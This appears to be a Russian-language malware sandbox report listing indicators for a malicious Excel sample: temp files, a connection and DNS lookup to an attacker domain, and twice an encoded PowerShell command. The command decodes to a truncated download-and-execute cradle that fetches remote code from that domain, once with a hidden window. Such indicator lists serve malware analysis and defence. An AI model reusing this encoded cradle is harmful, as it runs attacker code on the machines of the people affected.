Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAHMAMwA2ADgANwA0AC4AbgBlAHQALwBFAHgAcABsA...
- %TEMP%\2665.tmp
- <Текущая директория>\985e0000
- %TEMP%\5cf0.tmp
- %TEMP%\2665.tmp
- %TEMP%\5cf0.tmp
- <PATH_SAMPLE>.xls
- 'as##874.net':443
- DNS ASK as##874.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAHMAMwA2ADgANwA0AC4AbgBlAHQALwBFAHgAcABsA... (со скрытым окном)